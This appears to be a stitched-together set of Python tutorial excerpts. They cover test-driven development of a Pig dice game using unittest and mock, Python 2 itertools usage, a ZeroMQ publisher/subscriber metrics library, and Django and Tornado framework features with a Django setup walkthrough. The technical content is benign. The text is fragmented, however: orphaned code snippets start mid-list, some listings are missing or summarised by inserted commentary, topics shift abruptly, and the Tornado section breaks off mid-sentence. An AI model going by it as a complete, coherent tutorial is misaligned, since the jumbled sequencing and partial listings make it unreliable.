Listing 9. Stub of our new Pig.roll method

def roll(self):
    """Return a number between 1 and 6"""
    pass
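The test itself (Listing 8) falls outside this excerpt; per the refactored suite shown later in Listing 31, it presumably reads:

def test_roll(self):
    """A roll of the die results in an integer between 1 and 6"""
    pig = game.Pig('PlayerA', 'PlayerB')
    for i in range(500):
        r = pig.roll()
        self.assertIsInstance(r, int)
        self.assertTrue(1 <= r <= 6)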
Let's check the output. There is a new F on the first line of output. For each test method in our test suite,
we should expect to see some indication that the respective method was executed. So far we've seen three
common indicators:
E, which indicates that a test method ran but had a Python error,
F, which indicates that a test method ran but one of our assertions within that method failed,
., which indicates that a test method ran and that all assertions passed successfully.
There are other indicators, but these are the three we'll deal with for the time being. The next TDD step is to
satisfy the test we've just written. We can use Python's built-in random library to make short work of this new
Pig.roll method (Listing 11 and Listing 12).
Listing 11. Implementing the roll of a die

import random

def roll(self):
    """Return a number between 1 and 6"""
    return random.randint(1, 6)
Checking Scores
Players might want to check their score mid-game, so lets add a test to make sure thats possible. Again,
dont forget to stub out the new Pig.get_scores method (Listing 13 and Listing 14).
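Listing 13 is not reproduced in this excerpt; per the refactored suite shown later in Listing 31, the test presumably reads:

def test_scores(self):
    """Player scores can be retrieved"""
    pig = game.Pig('PlayerA', 'PlayerB', 'PlayerC')
    self.assertEqual(
        pig.get_score(),
        {'PlayerA': 0, 'PlayerB': 0, 'PlayerC': 0}
    )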
Note that ordering in dictionaries is not guaranteed, so your keys might not be printed in the same order
that you typed them in your code. And now to satisfy the test (Listing 15 and Listing 16).
Listing 15. First implementation for default scores

def __init__(self, *players):
    self.players = players
    self.scores = {}
    for player in self.players:
        self.scores[player] = 0

def get_score(self):
    """Return the score for all players"""
    return self.scores
The test has been satisfied. We could move on to another piece of code now if we'd like, but let's remember
the fifth step from our TDD process. Let's try refactoring some code that we already know is working and
make sure our assertions still pass.
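The refactoring listing itself is not part of this excerpt. One refactor consistent with the description below, leveraging a Python built-in, would be to replace the explicit loop with dict.fromkeys:

def __init__(self, *players):
    self.players = players
    # dict.fromkeys builds the same zeroed score mapping without a loop
    self.scores = dict.fromkeys(players, 0)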
The fact that our test still passes illustrates a few very important concepts about valuable
automated testing. The most useful unit tests treat the production code as a black box. We don't want
to test the implementation; rather, we want to test the output of a unit of code given a known input.
Testing the internal implementation of a function or method leads to trouble. In our case, we found a way
to leverage functionality built into Python to refactor our code. The end result is the same. Had we tested
the specific low-level implementation of our Pig.get_score definition, the test could have easily broken after
refactoring, despite the code still ultimately doing what we want.
The idea of validating the output of a unit of code given a known input encourages another valuable
practice: it stimulates the desire to design our code with more single-purpose functions and methods. It also
discourages the inclusion of side effects.
In this context, side effects can mean that we're changing internal variables or state which could influence
the behavior of other units of code. If we only deal with input values and return values, it's very easy
to reason about the behavior of our code. Side effects are not always bad, but they can introduce some
interesting conditions at runtime that are difficult to reproduce in automated testing.
It's much easier to confidently test smaller, single-purpose units of code than it is to test massive blocks of
code. We can achieve more complex behavior by chaining together the smaller units, and we can
have a high level of confidence in these compositions because we know the underlying units meet
our expectations.
The mock library is extremely powerful, but it can take a while to get used to. Here we're using it to mock
the return value of multiple calls to Python's built-in input function through mock's side_effect feature. When
you specify a list as the side effect of a mocked object, you're specifying the return value for each call to
that mocked object. For each call to input, the first value will be removed from the list and used as the return
value of the call.
In our code the first call to input will consume and return 'A', leaving ['M', 'Z', ''] as the remaining return
values. We add an additional empty value as a side effect to signal when we're done entering player names.
And we don't expect the empty value to appear as a player name.
Note that if you supply fewer return values in the side_effect list than you have calls to the mocked object,
the code will raise a StopIteration exception. Say, for example, that you set the side_effect to [1] but that you
called input twice in the code. The first time you call input, you'd get the 1 back. The second time you call
input, it would raise the exception, indicating that our side_effect list has nothing more to return.
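A quick sketch of that behavior in isolation:

from unittest import mock

fake = mock.Mock(side_effect=[1])
fake()  # returns 1
fake()  # raises StopIteration: the side_effect list is exhausted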
We're able to use this mocked input function through what's called a context manager; that is the block that
begins with the keyword with. A context manager basically handles the setup and teardown for the block of
code it contains. In this example, the mock.patch context manager handles the temporary patching of the
built-in input function while we run game.get_player_names().
After the code in the with block has been executed, the context manager rolls back the input function to its
original, built-in state. This is very important, particularly if the code in the with block raises some sort of error.
Even in conditions such as these, the changes to the input function will be reverted, allowing other code that
may depend on input's (or whatever object we have mocked) original functionality to proceed as expected.
Let's run the test suite to make sure our new test fails (Listing 22). Well, that was easy! Here's a possible way
to satisfy this test: Listing 23 and Listing 24.
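Listing 23 is not included in this excerpt; an implementation consistent with the prompts asserted in Listing 25 below might look like this:

def get_player_names():
    """Prompt for player names until an empty value is entered"""
    names = []
    while True:
        name = input("Player {}'s name: ".format(len(names) + 1))
        if not name:
            break
        names.append(name)
    return names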
Would you look at that?! We're able to test user input without slowing down our tests much at all!
Notice, however, that we have passed a parameter to the input function. This is the prompt that appears on
the screen when the program asks for player names. Let's say we want to make sure that it's actually printing
what we expect it to print (Listing 25).
Listing 25. Test that the correct prompt appears on screen

def test_get_player_names_stdout(self):
    """Check the prompts for player names"""
    with mock.patch('builtins.input', side_effect=['A', 'B', '']) as fake:
        game.get_player_names()
        fake.assert_has_calls([
            mock.call("Player 1's name: "),
            mock.call("Player 2's name: "),
            mock.call("Player 3's name: ")
        ])
Perfect. It works as we expect it to. One thing to take away from this example is that there does not need to
be a one-to-one ratio of test methods to actual pieces of code. Right now we've got two test methods for the
very same get_player_names function. It is often good to have multiple test methods for a single unit of code if
that code may behave differently under various conditions.
Also note that we didn't exactly follow the TDD process for this last test. The code for which we wrote
the test had already been implemented to satisfy an earlier test. It is acceptable to veer away from the TDD
process, particularly if we want to validate assumptions that have been made along the way. When we
implemented the original get_player_names function, we assumed that the prompt would look the way we
wanted it to look. Our latest test simply proves that our assumption was correct. And now we will be able
to quickly detect if the prompt begins misbehaving at some point in the future.
To Hold or To Roll
Now it's time to write tests for the different branches of code for when a player chooses to hold or roll again.
We want to make sure that our roll_or_hold method will only return roll or hold and that it won't error out
on invalid input (Listing 27).
Listing 27. Player can choose to roll or hold

@mock.patch('builtins.input')
def test_roll_or_hold(self, fake_input):
    """Player can choose to roll or hold"""
    fake_input.side_effect = ['R', 'H', 'h', 'z', '12345', 'r']
    pig = game.Pig('PlayerA', 'PlayerB')
    self.assertEqual(pig.roll_or_hold(), 'roll')
    self.assertEqual(pig.roll_or_hold(), 'hold')
    self.assertEqual(pig.roll_or_hold(), 'hold')
    self.assertEqual(pig.roll_or_hold(), 'roll')
This example shows yet another option that we have for mocking objects. We've decorated the
test_roll_or_hold method with @mock.patch('builtins.input'). When we use this option, we basically turn the
entire contents of the method into the block within a context manager: the builtins.input function will be a
mocked object throughout the entire method.
And to satisfy our new test, we could use something like this: Listing 29. Run the test suite (Listing 30). We know
that our new code works. Even better, we know that we haven't broken any existing functionality.
Refactoring Tests
Since we're doing so much with user input, let's take a few minutes to refactor our tests to use a common
mock for the built-in input function before proceeding with our testing (Listing 31).
A lot has changed in our test code, but the behavior should be exactly the same as before. Let's review
the changes (Listing 32).
We have defined a global mock.Mock instance called INPUT. This is the variable that we use in place of the
various uses of mocked input. We are also using mock.patch as a class decorator now, which allows all test
methods within the class to access the mocked input function through our INPUT global.
This decorator is a bit different from the one we used earlier. Instead of allowing a mock.Mock object to be
implicitly created for us, we're specifying our own instance. The value in this solution is that you don't have
to modify the method signatures of each test method to accept the mocked input function. Instead, any test
method that needs to access the mock may use the INPUT global (Listing 33).
Listing 31. Refactoring test code

from unittest import TestCase, mock

import game

INPUT = mock.Mock()

@mock.patch('builtins.input', INPUT)
class GameTest(TestCase):
    def setUp(self):
        INPUT.reset_mock()

    def test_join(self):
        """Players may join a game of Pig"""
        pig = game.Pig('PlayerA', 'PlayerB', 'PlayerC')
        self.assertEqual(pig.get_players(), ('PlayerA', 'PlayerB', 'PlayerC'))

    def test_roll(self):
        """A roll of the die results in an integer between 1 and 6"""
        pig = game.Pig('PlayerA', 'PlayerB')
        for i in range(500):
            r = pig.roll()
            self.assertIsInstance(r, int)
            self.assertTrue(1 <= r <= 6)

    def test_scores(self):
        """Player scores can be retrieved"""
        pig = game.Pig('PlayerA', 'PlayerB', 'PlayerC')
        self.assertEqual(
            pig.get_score(),
            {
                'PlayerA': 0,
                'PlayerB': 0,
                'PlayerC': 0
            }
        )
We've added a setUp method to our class. This method name has a special meaning when used with Python's
unittest library: the setUp method will be executed before each and every test method within the class. There's
a similar special method called tearDown that is executed after each and every test method within the class.
These methods are useful for getting things into a state such that our tests will run successfully, or for cleaning
up after our tests. We're using the setUp method to reset our mocked input function. This means that any calls
or side effects from one test method are removed from the mock, leaving it in a pristine state at the start of
each test (Listing 34).
The test_get_player_names test method no longer defines its own mock object. The context manager is also
not necessary anymore, since the entire method is effectively executed within a context manager because of
the mock.patch decorator applied to the whole class.
Finally, our test_roll_or_hold test method no longer has its own decorator. Also note that the additional
parameter to the method is no longer necessary. When you find that you are mocking the same thing in many
different test methods, as we were doing with the input function, a refactor like the one we've just done can be
a good idea. Your test code becomes much cleaner and more consistent. As your test suite continues to grow,
just like with any code, you need to be able to maintain it. Abstracting out common code early on, both in your
tests and in your production code, will help you and others to maintain and understand the code.
Now that we've reviewed the changes, let's verify that our tests haven't broken (Listing 36). Wonderful. All
is well with our refactored tests.
Listing 36. Refactoring has not broken our tests

......
----------------------------------------------------------------------
Ran 6 tests in 0.005s

OK
INPUT.side_effect = [
    # player names
    'George',
    'Bob',
    '',
    # roll or hold
    'r', 'r',            # George
    'r', 'r', 'r', 'h',  # Bob
    'r', 'r', 'r', 'h',  # George
]
pig = game.Pig(*game.get_player_names())
pig.roll = mock.Mock(side_effect=[
    6, 6, 1,     # George
    6, 6, 6, 6,  # Bob
    5, 4, 3, 2,  # George
])
self.assertRaises(StopIteration, pig.play)
self.assertEqual(
    pig.get_score(),
    {
        'George': 14,
        'Bob': 24
    }
)
Instead of monkey patching the Pig.roll method, we could have mocked the random.randint function.
However, doing so would be walking the fine and dangerous line of relying on the underlying
implementation of our Pig.roll method. If we ever changed our algorithm for rolling a die, and our tests
mocked random.randint, our test would likely fail even though the behavior stayed correct.
Our first course of action is to specify the values that we want returned from both of these mocked
functions. For our input, we'll start by prompting for player names and also include some roll-or-hold
responses. Next, we instantiate a Pig game and define some not-so-random values that the players will roll.
All we are interested in checking for now is that players take turns rolling and that their scores are
adjusted according to the rules of the game. We don't need to worry just yet about a player winning when
they earn 100 or more points.
Marvelous, the test fails, exactly as we wanted it to. Let's fix that by implementing our game (Listing 39).
The core of any game is that all players take turns. We will use Python's built-in itertools library to make
that easy. This library has a cycle function, which will continue to return the same values over and over.
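A minimal illustration of cycle:

>>> from itertools import cycle
>>> c = cycle(['George', 'Bob'])
>>> next(c), next(c), next(c)
('George', 'Bob', 'George')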
Let's fix the broken scores problem first. Notice that George has many more points than we expected: he
ended up with 26 points instead of the 14 that he should have earned. This suggests that he still earned points
for a turn when he shouldn't have. Let's inspect that block of code: Listing 41.
Ah hah! We display that the player loses their turn points when they roll a one, but we don't actually have
code to do that. Let's fix that: Listing 42. Now to verify that this fixes the problem (Listing 43).
Listing 42. The solution

if value == 1:
    print('{} rolled a 1 and lost {} points.'.format(player, turn_points))
    turn_points = 0
    break
Alternatively, if we don't care to make any assertions about what is printed to the screen, we can use a
decorator such as:
@mock.patch('builtins.print', mock.Mock())
def test_something(self):
The first option requires an additional parameter to the decorated test method, while the second option requires
no change to the test method signature. Since we aren't particularly interested in testing the print function right
now, we'll use the second option (Listing 44).
Listing 44. Suppressing print output

@mock.patch('builtins.print', mock.Mock())
def test_gameplay(self):
    """Users may play a game of Pig"""
    INPUT.side_effect = [
        # player names
        'George',
        'Bob',
        '',
        # roll or hold
        'r', 'r',            # George
        'r', 'r', 'r', 'h',  # Bob
        'r', 'r', 'r', 'h',  # George
    ]
    pig = game.Pig(*game.get_player_names())
    pig.roll = mock.Mock(side_effect=[
        6, 6, 1,     # George
        6, 6, 6, 6,  # Bob
        5, 4, 3, 2,  # George
    ])
    self.assertRaises(StopIteration, pig.play)
    self.assertEqual(
        pig.get_score(),
        {
            'George': 14,
            'Bob': 24
        }
    )
Isn't mock wonderful? It is very powerful, and we're only scratching the surface of what it offers.
    # roll or hold
    'r', 'r',  # George
]
pig = game.Pig(*game.get_player_names())
pig.roll = mock.Mock(side_effect=[2, 2])
pig.scores['George'] = 97
pig.scores['Bob'] = 96
pig.play()
self.assertEqual(
    pig.get_score(),
    {
        'George': 101,
        'Bob': 96
    }
)
fake_print.assert_called_with('George won the game with 101 points!')
Hey, there's the StopIteration exception that we discussed a couple of times before. We've only specified
two roll values, which should be enough to push George's score over 100. The problem is that the game
continues even when George's score exceeds the maximum, and our mocked Pig.roll method runs out of
return values. We don't want to use the TestCase.assertRaises method here. We expect the game to end after
any player's score reaches 100 points, which means the Pig.roll method should not be called anymore. Let's
try to satisfy the test (Listing 48).
Listing 48. First attempt to allow winning

def play(self):
    """Start a game of Pig"""
    for player in cycle(self.players):
        print('Now rolling: {}'.format(player))
        action = 'roll'
        turn_points = 0
        while action == 'roll':
            value = self.roll()
            if value == 1:
                print('{} rolled a 1 and lost {} points.'.format(player, turn_points))
                turn_points = 0
                break
            turn_points += value
            print('{} rolled a {} and now has {} points for this turn.'.format(
                player, value, turn_points
            ))
            action = self.roll_or_hold()
        self.scores[player] += turn_points
        if self.scores[player] >= 100:
            print('{} won the game with {} points!'.format(
                player, self.scores[player]
            ))
            return
After each player's turn, we check to see if the player's score is 100 or more. Seems like it should work,
right? Let's check (Listing 49).
Hmmm... We get the same StopIteration exception. Why do you suppose that is? We're just checking to see
if a player's total score reaches 100, right? That's true, but we're only doing it at the end of a player's turn.
We need to check whether they reach 100 points during their turn, not when they lose their turn points or
decide to hold. Let's try this again (Listing 50).
We've moved the total score check into the while loop, after the check to see if the player rolled a one. How
does our test look now (Listing 51)?
Listing 49. Same error as before; players still cannot win

.......E
======================================================================
ERROR: test_winning (test_game.GameTest)
A player wins when they earn 100 points
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/usr/lib/python3.3/unittest/mock.py", line 1087, in patched
    return func(*args, **keywargs)
  File "./test_game.py", line 130, in test_winning
    pig.play()
  File "./game.py", line 50, in play
    value = self.roll()
  File "/usr/lib/python3.3/unittest/mock.py", line 846, in __call__
    return _mock_self._mock_call(*args, **kwargs)
  File "/usr/lib/python3.3/unittest/mock.py", line 904, in _mock_call
    result = next(effect)
StopIteration

----------------------------------------------------------------------
Ran 8 tests in 0.011s

FAILED (errors=1)
    # roll or hold
    'r', 'r', 'h',  # George
    # Bob immediately rolls a 1
    'r', 'h',       # George
    'r', 'r', 'h',  # Bob
The first object we're mocking is the built-in print function. Again, this way of mocking objects is very
similar to mocking with class or method decorators. Since we will be invoking the game from the command
line, we won't be able to easily inspect the internal state of our Pig game instance for scores. As such, we're
mocking print so that we can check the screen output against our expectations.
We're also patching our Pig.roll method as before, only this time we're using the mock.patch.object function.
Notice that all of our uses of mock.patch thus far have passed a simple string as the first parameter. This time
we're passing an actual object as the first parameter and a string as the second parameter.
The mock.patch.object function allows us to mock members of another object. Again, since we won't have
direct access to the Pig instance, we can't monkey patch Pig.roll the way we did previously. The outcome
of this method should be the same as with the other method.
Being the lazy programmers that we are, we've chosen to use the itertools.cycle function again to continuously
return some value for each roll of the die. Since we don't want to specify roll-or-hold values for an entire
game of Pig, we use TestCase.assertRaises to say we expect mock to raise a StopIteration exception when there
are no additional return values for the input mock.
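The test listing itself (Listing 52) is not reproduced in this excerpt; based on the description above, a sketch of its shape might look like this, where the exact cycled roll values and roll-or-hold inputs are assumptions:

from itertools import cycle

@mock.patch('builtins.print')
@mock.patch.object(game.Pig, 'roll', mock.Mock(side_effect=cycle([6, 6, 1])))
def test_command_line(self, fake_print):
    """The game can be invoked from the command line"""
    INPUT.side_effect = [
        # player names
        'George',
        'Bob',
        '',
        # roll or hold
        'r', 'r', 'h',  # George
    ]
    # the input mock runs out of values, ending the game with StopIteration
    self.assertRaises(StopIteration, game.main)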
I should mention that testing screen output as we're doing here is not exactly the best idea. We might change
the strings, or we might later add more print calls. Either case would require that we modify the test itself,
and that's added overhead. Having to maintain production code is a chore by itself, and adding test case
maintenance on top of that is not exactly appealing.
That said, we will push forward with our test this way for now. We should run our test suite, but be sure to
mock out the new main function in game.py first (Listing 53).
Listing 53. Expected failure
F........
======================================================================
FAIL: test_command_line (test_game.GameTest)
The game can be invoked from the command line
----------------------------------------------------------------------
Traceback (most recent call last):
We haven't implemented our main function yet, so none of the mocked input values are consumed, and no
StopIteration exception is raised. Just as we expect for now. Let's write some code to launch the game from
the command line (Listing 54). Hey, that code looks pretty familiar, doesn't it? It's pretty much the
same code we've used in previous gameplay test methods. Awesome!
Listing 54. Basic command line entry point

def main():
    """Launch a game of Pig"""
    game = Pig(*get_player_names())
    game.play()

if __name__ == '__main__':
    main()
There's one small bit of magic code that we've added at the bottom. That if statement is how you allow a
Python script to be invoked from the command line. Let's run the test again to make sure the main
function does what we expect (Listing 55).
Beauty! At this point, you should be able to invoke your very own Pig game on the command line by running:
python game.py
Isn't that something? We waited to run the game manually until we had written and satisfied tests for all of
the basic requirements for a game of Pig. The first time we play it ourselves, the game just works!
What Now?
Now that we have a functional game of Pig, here are some tasks that you might consider implementing to
practice TDD.
accept player names via the command line (without the prompt),
bail out if only one player name is given,
allow the maximum point value to be specified on the command line,
allow players to see their total score when choosing to roll or hold,
track player scores in a database,
print the runner-up when there are three or more players,
turn the game into an IRC bot.
The topics covered in this article should have given you a good enough foundation to write tests for each one
of these additional tasks.
Listing 2. For example, a list and a string are iterables but they are not iterators
>>> a = [1, 2, 3, 4, 5]
>>> a.__iter__
<method-wrapper '__iter__' of list object at 0x02A16828>
>>> a.next()
Traceback (most recent call last):
  File "<pyshell#76>", line 1, in <module>
    a.next()
AttributeError: 'list' object has no attribute 'next'
>>> iter(a)
<listiterator object at 0x02A26DD0>
>>> iter(a).next()
1
Files are iterables that are also their own iterators, which is a common source of confusion. But that
arrangement actually makes sense: the iterator needs to know the details of how files are read and buffered,
so it might as well live in the file object, where it can access all that information without breaking the abstraction
(Listing 3).
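Listing 3 is not part of this excerpt, but the point is easy to check at the REPL:

>>> f = open('some_file.txt')  # any existing text file will do
>>> iter(f) is f               # a file object is its own iterator
True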
Why the distinction? An iterable object is just something that might make sense to treat as a collection,
somehow, in an abstract way. An iterator lets you specify exactly what it means to iterate over a type,
without tying that type's iterability to any one specific iteration mode. Python has no interfaces, but this
concept of separating interface ("this object supports X") from implementation ("doing X means Y and Z")
has been carried over from languages that do, and it turns out to be very useful.
Itertools Module
The itertools module defines a number of fast and highly efficient functions for working with sequence-like
datasets. The functions in itertools are efficient because data is not stored in memory; it is produced only
when needed, which reduces memory usage, avoids the side effects of working with huge datasets, and
increases performance.
chain(iter1, iter2, iter3, ...) returns a single iterator which is the result of chaining together all the iterators
passed in as arguments.
combinations(iterable, n) takes two arguments, an iterable and a combination length n, and returns all possible
n-length combinations of elements in that iterable.
compress(data, selector) takes two iterables as arguments and returns an iterator with only those values in
data that correspond to true values in selector.
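For instance:

>>> import itertools
>>> list(itertools.chain([1, 2], [3, 4]))
[1, 2, 3, 4]
>>> list(itertools.combinations('ABC', 2))
[('A', 'B'), ('A', 'C'), ('B', 'C')]
>>> list(itertools.compress([1, 2, 3, 4], [1, 0, 1, 0]))
[1, 3]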
count(start, step) takes two optional arguments; start defaults to 0. It returns consecutive integers (stepping
by step), and there is no upper bound, so you will have to provide a condition to stop the iteration.
cycle(iterable) returns an iterator that indefinitely cycles over the contents of the iterable argument it is
given. It can consume a lot of memory if the argument is a huge iterable.
>>> p = 0
>>> for i in itertools.cycle([1, 2, 3]):
        p += 1
        if p > 20: break
        print i,

1 2 3 1 2 3 1 2 3 1 2 3 1 2 3 1 2 3 1 2
dropwhile(condition, iterator) returns an iterator that starts producing values once the condition becomes
false for the very first time. After the condition becomes false, it returns all the remaining values in the
iterator until it is exhausted.
ifilter(condition, iterable) returns an iterator for those items in the iterable for which the condition is true.
This is different from dropwhile, which returns everything after the condition is first false; ifilter tests the
condition for every element.
islice(iterable, start, stop, step) returns an iterator with selected items from the input iterable by index.
The start argument defaults to 0 and the step argument defaults to 1 if not given.
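For instance:

>>> import itertools
>>> list(itertools.dropwhile(lambda x: x < 3, [1, 2, 3, 4, 1]))
[3, 4, 1]
>>> list(itertools.ifilter(lambda x: x % 2, [1, 2, 3, 4, 5]))
[1, 3, 5]
>>> list(itertools.islice('ABCDEFG', 2, 6, 2))
['C', 'E']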
izip(iter1, iter2, iter3, ...) returns an izip object whose next() returns a tuple with the i-th element from each
of the iterables given as arguments. It raises StopIteration when the smallest iterable is exhausted.
izip_longest(iter1, iter2, ..., fillvalue=None) is similar to izip but iterates until the longest iterable is
exhausted; when the shorter iterables are exhausted, fillvalue is substituted in their place.
repeat(object, n) returns the object n times; if n is not given, it returns the object endlessly.
starmap(function, iterable) returns an iterator whose elements are the result of mapping the function to the
elements of the iterable. It is used instead of imap when the elements of the iterable are already grouped
into tuples.
takewhile(condition, iterable) is the opposite of dropwhile: it returns an iterator whose values are items from
the input iterable for as long as the condition is true. It stops as soon as the first value fails the condition.
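For instance:

>>> import itertools
>>> list(itertools.izip([1, 2, 3], 'AB'))
[(1, 'A'), (2, 'B')]
>>> list(itertools.izip_longest([1, 2, 3], 'AB', fillvalue='-'))
[(1, 'A'), (2, 'B'), (3, '-')]
>>> list(itertools.starmap(pow, [(2, 3), (3, 2)]))
[8, 9]
>>> list(itertools.takewhile(lambda x: x < 3, [1, 2, 3, 4, 1]))
[1, 2]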
>>> s = 0
>>> p = '123ab'
>>> for i in itertools.tee(p, 3):
        print 'iterator %d:' % s,
        s += 1
        for q in i:
            print q,
        print '\n'

iterator 0: 1 2 3 a b
iterator 1: 1 2 3 a b
iterator 2: 1 2 3 a b
Summary
I believe that by now you have a clear understanding of Python iterators and iterables. The huge
advantage of iterators is that they have an almost constant memory footprint. The itertools module can be
very handy in hacking competitions because of its efficiency and speed.
ZeroMQ
Enter ZeroMQ.
On the surface, it would seem that ZeroMQ is a very fast (zero-time) message queue, but I find that a bit
of a misnomer. It's not a message broker like RabbitMQ. It doesn't support the Advanced Message Queuing
Protocol (AMQP). There's no management interface. It doesn't persist messages to disk, and if you don't
have a subscriber, all of the publisher's messages are dropped by default. You can't inspect messages or get
statistics on the queue, at least not without writing your own management layer.
ZeroMQ is more like a brilliant and fast socket library with built-in support for a wide variety of
asynchronous patterns. This makes ZeroMQ an ideal message dispatcher when you don't need complex
broker features. For my metrics library, I didn't need those features, but I did need speed.
Gauges: finally, Zibrato can be used to insert an arbitrary value into the backend at any point in the code.
from zibrato import Zibrato
z = Zibrato()
# Zibrato gauge
z.gauge(level='crit', name='gauge_name', value=123)
This is just a quick overview of how Zibrato is used to instrument code. For more information, check out the
library on PyPI (https://pypi.python.org/pypi/Zibrato) or look at my GitHub repository
(https://github.com/version2beta/zibrato).
The architecture
In order to accomplish the goals behind the API, Zibrato is divided into three parts:
The Zibrato library, which implements the API described above and publishes metrics to the message queue.
As a user, I can have zero or more instrumented processes all communicating with my message queue.
A message broker, which subscribes to zero or more publishers of metrics and in turn republishes the
metrics to zero or more backend subscribers.
Zero or more backend providers, which subscribe to the message broker to receive metrics, then in turn
do whatever is appropriate with them. In my application, the backend provider sends the messages to my
Librato account.
Using ZeroMQ
Clearly, ZeroMQ is the special sauce in the Zibrato architecture, doing the heavy lifting of moving messages
from the instrumented code to the backend providers. It provides the asynchronicity.
If you don't already have ZeroMQ's Python bindings installed, it's easy to do with pip (you may also need
your system's Python development headers, e.g. the python-dev package, for the build):
pip install --upgrade pyzmq
If you're running Anaconda Python from Continuum Analytics, pyzmq is already installed.
Building a subscriber
A broker without any listeners has little purpose in life. Let's create a simple subscriber that receives
messages and prints them to standard output. We'll create this in a separate Python script; it runs
separately from the broker. Here's how to create a subscriber:
First, we connect to our ZeroMQ context described above.
Then we create our listener's socket.
Next, we set a filter to which our socket subscribes. Our call to receive messages from the message broker
will only return values that start with this filter. An empty string subscribes to all messages, but the default is
to subscribe to no messages, so we have to set it to something, even if it's an empty string.
Finally, we set up a loop to keep on listening until something comes in.
Our code might look like this:
import zmq

# Get the ZeroMQ context
context = zmq.Context()

# Create a socket
socket = context.socket(zmq.SUB)
socket.connect('tcp://127.0.0.1:5551')

# Subscribe to all messages
socket.setsockopt(zmq.SUBSCRIBE, '')

# Keep on keeping on
while True:
    print socket.recv()
This code gives us a listener that will receive anything the broker forwards and print it to STDOUT. Now all
we need is someone to give the broker some messages to forward.
Building a publisher
If a tree falls in the forest and there's no one to hear it, does it make any noise? I don't know the answer to
that question, but I do know that a message broker without any publishers lives a pretty quiet life.
Connecting our broker to a publisher is easy to do. In a third Python script, we'll create a publisher that
sends messages to the broker. If we do it right, the subscriber we created in the last section will receive these
messages and print them to STDOUT.
Here's how to build a publisher:
First, we connect to our ZeroMQ context, just like we did above.
Next, we create our publisher socket.
Finally, we send a message from our publisher to the message broker.
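The publisher listing is not reproduced in this excerpt; a minimal sketch, assuming the broker listens for publishers on tcp://127.0.0.1:5550 (the port is an assumption), might look like this:

import zmq

# Get the ZeroMQ context, just like the subscriber does
context = zmq.Context()

# Create a publisher socket; the address must match the broker's
# publisher-facing endpoint
socket = context.socket(zmq.PUB)
socket.connect('tcp://127.0.0.1:5550')

# Send a message to the broker
socket.send('Hello from the publisher')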
With these three components, we have a publisher that sends messages, a subscriber that receives messages,
and a broker that forwards messages from any connected publisher to any connected subscriber.
Credits
Isaac Newton once said, "If I have seen further it is by standing on the shoulders of giants." At best I squat
and risk falling off the giant's shoulders, so I prefer the earlier quote from Isaiah di Trani, who said: "Who
sees further, a dwarf or a giant? Surely a giant, for his eyes are situated at a higher level than those of the
dwarf. But if the dwarf is placed on the shoulders of the giant, who sees further? ... So too we are dwarfs
astride the shoulders of giants. We master their wisdom and move beyond it."
ZeroMQ is the brilliant work of Pieter Hintjens and iMatix Corporation. It is a powerful and flexible
messaging platform, and I highly recommend it for asynchronous applications. I also recommend reading
Pieter's ZeroMQ Guide. It's lengthy and comprehensive, but it's quite accessible and even an enjoyable read.
http://zeromq.org/
http://zguide.zeromq.org/
I first became aware of Librato on the Ruby Rogues podcast #62 featuring Joe Ruscio, Librato's CTO and
cofounder. They've done an excellent job of making metrics easy. Librato offers free development accounts
and a free month of production use, with very reasonable pricing thereafter.
https://metrics.librato.com/
http://rubyrogues.com/062-rr-monitoring-with-joseph-ruscio/
Zibrato was initially inspired by Etsy's Statsd package, a Node.js service that, coupled with Graphite (written
in Python and Django), provides a full asynchronous instrumentation stack. On a related note, check out Steve
Ivy: he has not only written a Python library for interfacing with Statsd, he has also reimplemented Statsd
itself in Python.
Django Features
Django is a one-size-fits-all system. The most fundamental piece of the web is the HTTP request. Django's
controllers allow regular expression matching on URLs to call the right functions and field incoming requests.
Much like with any web framework, you get sensible default requests and responses, with the ability to override
them. You can determine GET or POST along with other web context, so you can separate your code cleanly.
If you're like most people or companies, you will want to collect data from your users and store it in a database.
This is one place where Django can really help out with its robust defaults. It has a form generator that allows
you to define a form in terms of your database fields, generates the HTML for you, and validates
the user's data on a POST submission. The sophisticated data model reads your existing database schema, or
creates one for you, and generates code to define the schema as software objects. You can then read and set
attributes, query based on filters, and otherwise think of your SQL data in terms of objects in a class hierarchy.
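For what it's worth, defining such a model takes only a few declarative lines. This sketch is illustrative, with hypothetical field names rather than anything from the article:

from django.db import models

class Message(models.Model):
    # each field maps to a database column
    sender = models.EmailField()
    subject = models.CharField(max_length=100)
    body = models.TextField()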
The Achilles heel of the system, however, is that it is hard to stylize if you have a specific set of graphic design
goals. The template system provides the View part of MVC. You can assign variables to an HTML template
which lives outside of the Python code, and the template's values will be replaced. This is fairly standard
practice these days, and Django does a great job of it. You can loop over iterable objects such as lists and
dictionaries, and call functions. Template inheritance is a simple yet powerful way of defining standard
headers and footers, as well as other features, so they exist on every page. The templating is not the fastest on
the web, however, so you should plan for additional processing time. Since it is such a mature system, Django
has all kinds of other features as well: user authentication, localization, unicode handling, and the list goes on.
If you want a framework that will cover everything you can possibly need, and you just don't have the time or
skill to do a lot of work to get it done, then Django is a great system for you. As they describe it, Django is "the
web framework for perfectionists with deadlines."
Tornado Features
Tornado is perhaps the leanest and meanest of the fully featured Python frameworks. It is small and fast, while
handling the basic expectations of an MVC framework. Smaller also means simpler, so you get easy access
Django Example
Django has an excellent tutorial that will help you understand the depth and breadth of its features; it can be found
at https://docs.djangoproject.com/en/dev/intro/tutorial01/. It walks you through what it takes to bring up a
Minimum Viable Server. For brevity, I am going to cut through a lot of that and create a Minimum Functioning
Program. Let's create a set of web pages that allow someone to send you an email message through the web and
store the message in the database, without all the extras that you would want to operate a web-based business. Once
you have Django installed, run its admin system from the shell:
%> django-admin.py startproject django_sdj
%> cd django_sdj
%> python manage.py runserver
Go to http://localhost:8000 in your browser; you should get a standard hello page. When you have that
going, move on to the next steps. For simplicity, let's use a SQLite database and let Django provision it for us.
Edit settings.py to look like this:
'ENGINE': 'django.db.backends.sqlite3',  # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'django_sdj.sqlite3',
Then back in the shell, run Django's syncdb command and follow the prompts:
%> python manage.py syncdb
Then edit settings.py and hello/models.py to begin adding some meat to your app. See the code diff I made here:
https://github.com/mdagosta/hello-sdj/commit/c8970ded6fc015f57278ad128f5b9195eeaa2a4e. Check out what
the Django model will generate:
%> python manage.py sql hello # sample output. if it looks ok..
%> python manage.py syncdb
The Django Admin interface is really convenient and worth setting up. I'll skip over the details, but to get it
working I did this: https://github.com/mdagosta/hello-sdj/commit/7e4744e7c92be1e3430a147b4965ae0b7172dd03.
Keep following along with the code, and add some urls and views: https://github.com/mdagosta/hello-sdj/
